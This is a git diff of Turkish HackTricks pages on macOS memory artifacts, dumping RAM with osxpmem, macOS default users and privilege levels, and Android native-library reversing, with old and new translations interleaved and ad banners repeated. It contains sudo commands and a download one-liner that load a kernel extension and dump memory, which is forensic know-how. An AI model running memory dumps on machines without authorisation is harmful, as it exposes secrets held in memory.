[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevsellikler sunan **karanlık ağ** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **tanıtmak** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da** takip edin.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da takip edin.
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
</details>

View file

@ -2,41 +2,55 @@
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan ileri seviyeye öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## Bellek Sanatıkları
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Bellek Kalıntıları
### Takas Dosyaları
`/private/var/vm/swapfile0` gibi takas dosyaları, **fiziksel bellek dolu olduğunda önbellek olarak hizmet verir**. Fiziksel bellekte yer kalmadığında, veriler bir takas dosyasına aktarılır ve ihtiyaç duyulduğunda tekrar fiziksel belleğe getirilir. swapfile0, swapfile1 gibi isimlerle birden fazla takas dosyası bulunabilir.
`/private/var/vm/swapfile0` gibi takas dosyaları, **fiziksel bellek dolu olduğunda önbellek olarak hizmet verir**. Fiziksel bellekte daha fazla yer olmadığında, veriler bir takas dosyasına aktarılır ve ihtiyaç duyulduğunda fiziksel belleğe geri getirilir. swapfile0, swapfile1 gibi isimlerle birden fazla takas dosyası bulunabilir.
### Uyku Görüntüsü
`/private/var/vm/sleepimage` konumunda bulunan dosya, **uyku modunda** önemlidir. **OS X uyku modundayken bellek verileri bu dosyada depolanır**. Bilgisayar uyandığında, sistem bellek verilerini bu dosyadan alır ve kullanıcının kaldığı yerden devam etmesini sağlar.
`/private/var/vm/sleepimage` konumundaki dosya, **uykuda modundayken kritiktir**. **OS X uyku modundayken bellek verileri bu dosyada depolanır**. Bilgisayar uyandığında, sistem bellek verilerini bu dosyadan alır ve kullanıcıya kaldığı yerden devam etme olanağı sağlar.
Modern MacOS sistemlerinde, bu dosyanın genellikle güvenlik nedenleriyle şifrelendiğini ve kurtarmanın zor olduğunu belirtmek gerekir.
Modern MacOS sistemlerinde, bu dosyanın genellikle güvenlik nedenleriyle şifrelendiğini ve kurtarmanın zor olduğunu belirtmek önemlidir.
* Uyku görüntüsü için şifrelemenin etkin olup olmadığını kontrol etmek için `sysctl vm.swapusage` komutu çalıştırılabilir. Bu, dosyanın şifrelenip şifrelenmediğini gösterecektir.
* Uyku görüntüsü için şifrelemenin etkin olup olmadığını kontrol etmek için `sysctl vm.swapusage` komutunu çalıştırabilirsiniz. Bu, dosyanın şifrelenip şifrelenmediğini gösterecektir.
### Bellek Basıncı Günlükleri
MacOS sistemlerindeki başka bir önemli bellek ile ilgili dosya, **bellek basıncı günlükleri**dir. Bu günlükler `/var/log` konumunda bulunur ve sistem bellek kullanımı ve basınç olayları hakkında detaylı bilgiler içerir. Bellek ile ilgili sorunları teşhis etmek veya sistem belleğinin zaman içinde nasıl yönetildiğini anlamak için özellikle faydalı olabilirler.
MacOS sistemlerindeki başka bir önemli bellek ile ilgili dosya **bellek basıncı günlüğü**dür. Bu günlükler `/var/log` konumunda bulunur ve sistem bellek kullanımı ve basınç olayları hakkında detaylı bilgiler içerir. Bellek ile ilgili sorunları teşhis etmek veya sistem belleğin zaman içinde nasıl yönetildiğini anlamak için oldukça faydalı olabilirler.
## osxpmem ile bellek dökümü
## osxpmem ile belleği dökme
Bir MacOS makinede belleği dökmek için [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip) kullanabilirsiniz.
Bir MacOS makinesinde belleği dökmek için [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip) kullanabilirsiniz.
**Not**: Aşağıdaki talimatlar yalnızca Intel mimarisine sahip Mac'ler için çalışacaktır. Bu araç şu anda arşivlenmiştir ve son sürümü 2017'de yayınlanmıştır. Aşağıdaki talimatlarla indirilen ikili dosya, Apple Silicon 2017'de mevcut olmadığı için Intel çipleri hedef almaktadır. arm64 mimarisi için ikili dosyayı derlemek mümkün olabilir, ancak bunu kendiniz denemelisiniz.
**Not**: Aşağıdaki talimatlar yalnızca Intel mimarisine sahip Mac'ler için çalışacaktır. Bu araç artık arşivlenmiştir ve son sürümü 2017'de yayınlanmıştır. Aşağıdaki talimatlarla indirilen ikili dosya, Apple Silicon'in 2017'de mevcut olmadığı için Intel yongaları hedef almaktadır. arm64 mimarisi için ikili dosyayı derlemek mümkün olabilir ancak bunu kendiniz denemelisiniz.
```bash
#Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
@ -44,16 +58,16 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
#Dump aff4 format
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
```
Eğer şu hatayı bulursanız: `osxpmem.app/MacPmem.kext yüklenemedi - (libkern/kext) kimlik doğrulama hatası (dosya sahipliği/izinleri); hatalar için sistem/çekirdek günlüklerini kontrol edin veya kextutil(8)'i deneyin` Bunun düzeltilmesi için şunları yapabilirsiniz:
Eğer bu hatayı bulursanız: `osxpmem.app/MacPmem.kext yüklenemedi - (libkern/kext) kimlik doğrulama hatası (dosya sahipliği/izinleri); hatalar için sistem/kernel günlüklerini kontrol edin veya kextutil(8)'i deneyin` Düzeltmek için şunu yapabilirsiniz:
```bash
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
sudo kextutil "/tmp/MacPmem.kext"
#Allow the kext in "Security & Privacy --> General"
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
```
**Diğer hatalar**, "Güvenlik ve Gizlilik --> Genel" bölümünde **kext yüklemeye izin verilerek** düzeltilebilir, sadece **izin verin**.
**Diğer hatalar**, sadece "Güvenlik ve Gizlilik --> Genel" bölümünde **kext'in yüklenmesine izin verilmesi** ile **düzeltilebilir**, sadece **izin verin**.
Ayrıca, uygulamayı indirmek, kext'i yüklemek ve belleği dökmek için bu **tek satırlık komutu** kullanabilirsiniz:
Uygulamayı indirmek, kext'i yüklemek ve belleği dökmek için bu **oneliner'ı** da kullanabilirsiniz:
{% code overflow="wrap" %}
```bash
@ -62,16 +76,28 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
```
{% endcode %}
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunan **karanlık ağ** destekli bir arama motorudur.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
</details>

View file

@ -2,26 +2,40 @@
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek için** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) **kontrol edin**!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) **edinin**
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) **keşfedin**, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'da takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) **ve** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına PR göndererek paylaşın**.
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın(https://github.com/sponsors/carlospolop)!
- [**Resmi PEASS & HackTricks ürünleri**]'ni edinin(https://peass.creator-spring.com)
- [**PEASS Ailesi**]'ni keşfedin(https://opensea.io/collection/the-peass-family), özel [**NFT'ler**] koleksiyonumuz(https://opensea.io/collection/the-peass-family)
- **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
- **Hacking püf noktalarınızı göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
### Ortak Kullanıcılar
* **Daemon**: Sistem daemonları için ayrılmış kullanıcı. Varsayılan daemon hesap adları genellikle "\_" ile başlar:
- **Daemon**: Sistem daemonları için ayrılmış kullanıcı. Varsayılan daemon hesap adları genellikle "\_" ile başlar:
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
```
* **Guest**: Çok sıkı izinlere sahip misafir hesabı
- **Guest**: Çok sıkı izinlere sahip misafir hesabı
{% code overflow="wrap" %}
```bash
@ -30,26 +44,26 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
```
{% endcode %}
* **Kimse**: Minimal izinler gerektiğinde bu kullanıcıyla işlemler gerçekleştirilir.
* **Kimse**: Minimum izinler gerektiren işlemler bu kullanıcıyla gerçekleştirilir
* **Root**
### Kullanıcı Yetkileri
### Kullanıcı İzinleri
* **Standart Kullanıcı**: En temel kullanıcıdır. Bu kullanıcı, yazılım yüklemek veya diğer gelişmiş görevleri gerçekleştirmek için bir yönetici kullanıcıdan izin alması gerekmektedir. Kendi başlarına bunları yapamazlar.
* **Yönetici Kullanıcı**: Çoğu zaman standart bir kullanıcı olarak çalışan, ancak yazılım yüklemek ve diğer yönetimsel görevler gibi root işlemlerini gerçekleştirmeye izin verilen bir kullanıcıdır. Yönetici grubuna ait tüm kullanıcılara **sudoers dosyası aracılığıyla root erişimi verilir**.
* **Root**: Root, neredeyse herhangi bir işlemi gerçekleştirmeye izin verilen bir kullanıcıdır (Sistem Bütünlük Koruması gibi korumalar tarafından getirilen sınırlamalar vardır).
* Örneğin root, `/System` dizini içine bir dosya yerleştiremez.
* **Standart Kullanıcı:** En temel kullanıcı türüdür. Bu kullanıcı, yazılım yüklemeye veya diğer gelişmiş görevleri gerçekleştirmeye çalıştığında bir yönetici kullanıcıdan izin alması gerekir. Kendi başlarına bunları yapamazlar.
* **Yönetici Kullanıcı**: Çoğu zaman standart bir kullanıcı olarak çalışan ancak yazılım yüklemek ve diğer yönetici görevlerini gerçekleştirmesine izin verilen bir kullanıcıdır. Yönetici grubuna ait tüm kullanıcılara **sudoers dosyası aracılığıyla root erişimi verilir**.
* **Root**: Root, neredeyse herhangi bir işlemi gerçekleştirmesine izin verilen bir kullanıcıdır (Sistem Bütünlük Koruması gibi korumalar tarafından belirli kısıtlamalar getirilmiştir).
* Örneğin root, `/System` dizini içine bir dosya yerleştiremez
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı yapmak veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,27 +2,41 @@
<details>
<summary><strong>AWS hackleme becerilerinizi sıfırdan kahramana dönüştürün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>ile</strong>!</summary>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
HackTricks'i desteklemenin diğer yolları:
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) takip edin.
* Hacking hilelerinizi göndererek **HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
**Daha fazla bilgi için: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
Android uygulamaları, performans açısından kritik görevler için genellikle C veya C++ ile yazılmış olan yerel kütüphaneleri kullanabilir. Kötü amaçlı yazılım oluşturucuları da bu kütüphaneleri kullanır çünkü DEX bytecode'dan daha zor tersine mühendislik yapılırlar. Bu bölüm, Android'e özgü tersine mühendislik becerilerine odaklanırken, derleme dillerini öğretmek yerine Android'e özgü tersine mühendislik becerilerini vurgular. Uyumluluk için ARM ve x86 sürümleri sağlanmıştır.
Android uygulamaları, performans açısından kritik görevler için genellikle C veya C++ ile yazılmış olan yerel kütüpheleri kullanabilir. Kötü amaçlı yazılım oluşturucuları da bu kütüphaneleri kullanır, çünkü bunlar DEX bytecode'a göre daha zor tersine mühendislik yapılmasını sağlar. Bu bölüm, Android'e özgü tersine mühendislik becerilerine odaklanırken, montaj dillerini öğretmek yerine Android için uyarlanmıştır. Uyum sağlamak için ARM ve x86 sürümleri sağlanmıştır.
### Ana Noktalar:
- **Android Uygulamalarında Yerel Kütüphaneler:**
- Performans yoğun görevler için kullanılır.
- Tersine mühendisliği zorlaştıran C veya C++ ile yazılmıştır.
- Linux ikili dosyalarına benzer şekilde `.so` (paylaşılan nesne) formatında bulunur.
- `.so` (paylaşılan nesne) formatında bulunur, Linux ikililerine benzerdir.
- Kötü amaçlı yazılım oluşturucuları analizi zorlaştırmak için yerel kodu tercih eder.
- **Java Native Interface (JNI) ve Android NDK:**
@ -30,43 +44,29 @@ Android uygulamaları, performans açısından kritik görevler için genellikle
- NDK, yerel kod yazmak için Android'e özgü bir araç setidir.
- JNI ve NDK, Java (veya Kotlin) kodunu yerel kütüphanelerle birleştirir.
- **Kütüphane Yükleme ve Yürütme:**
- Kütüphaneler, belleğe `System.loadLibrary` veya `System.load` kullanılarak yüklenir.
- **Kütüphane Yükleme ve Çalıştırma:**
- Kütüphaneler, `System.loadLibrary` veya `System.load` kullanılarak belleğe yüklenir.
- Kütüphane yüklendiğinde JNI_OnLoad çalıştırılır.
- Java tarafında bildirilen yerel yöntemler, yerel işlevlerle bağlantı kurarak yürütme sağlar.
- Java tarafından bildirilen yerel yöntemler, yerel işlevlerle bağlantı kurarak çalışmayı sağlar.
- **Java Yöntemlerini Yerel İşlevlere Bağlama:**
- **Dinamik Bağlama:** Yerel kütüphanelerdeki işlev adları belirli bir desene uyar, böylece otomatik bağlantı sağlanır.
- **Statik Bağlama:** Bağlantı için `RegisterNatives` kullanır, işlev adlandırma ve yapısında esneklik sağlar.
- **Dinamik Bağlama:** Yerel kütüphelerdeki işlev adları belirli bir deseni eşleştirir, otomatik bağlama sağlar.
- **Statik Bağlama:** Bağlama için `RegisterNatives` kullanır, işlev adlandırma ve yapısında esneklik sağlar.
- **Tersine Mühendislik Araçları ve Teknikleri:**
- Ghidra ve IDA Pro gibi araçlar, yerel kütüphaneleri analiz etmeye yardımcı olur.
- Ghidra ve IDA Pro gibi araçlar, yerel kütüpheleri analiz etmede yardımcı olur.
- `JNIEnv`, JNI işlevlerini ve etkileşimleri anlamak için önemlidir.
- Kütüphane yükleme, yöntemleri bağlama ve yerel işlevleri tanımlama pratiği için egzersizler sunulur.
- Kütüphaneleri yükleme, yöntemleri bağlama ve yerel işlevleri tanımlama pratiği yapmak için egzersizler sağlanmaktadır.
### Kaynaklar:
- **ARM Assembly Öğrenme:**
- Temel mimari anlayışını daha derinlemesine anlamak için önerilir.
- Azeria Labs'ten [ARM Assembly Temelleri](https://azeria-labs.com/writing-arm-assembly-part-1/) önerilir.
- **ARM Montajı Öğrenme:**
- Altta yatan mimariyi daha iyi anlamak için önerilir.
- Azeria Labs'ten [ARM Montaj Temelleri](https://azeria-labs.com/writing-arm-assembly-part-1/) tavsiye edilir.
- **JNI ve NDK Belgeleri:**
- [Oracle'ın JNI Spesifikasyonu](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [Android'in JNI İpuçları](https://developer.android.com/training/articles/perf-jni)
- [Oracle'ın JNI Özellikleri](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [Android JNI İpuçları](https://developer.android.com/training/articles/perf-jni)
- [NDK ile Başlarken](https://developer.android.com/ndk/guides/)
- **Yerel Kütüphanelerin Hata Ayıklanması:**
- [JEB Decompiler Kullanarak Android Yerel Kütüphanelerini Hata Ayıklama](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
<details>
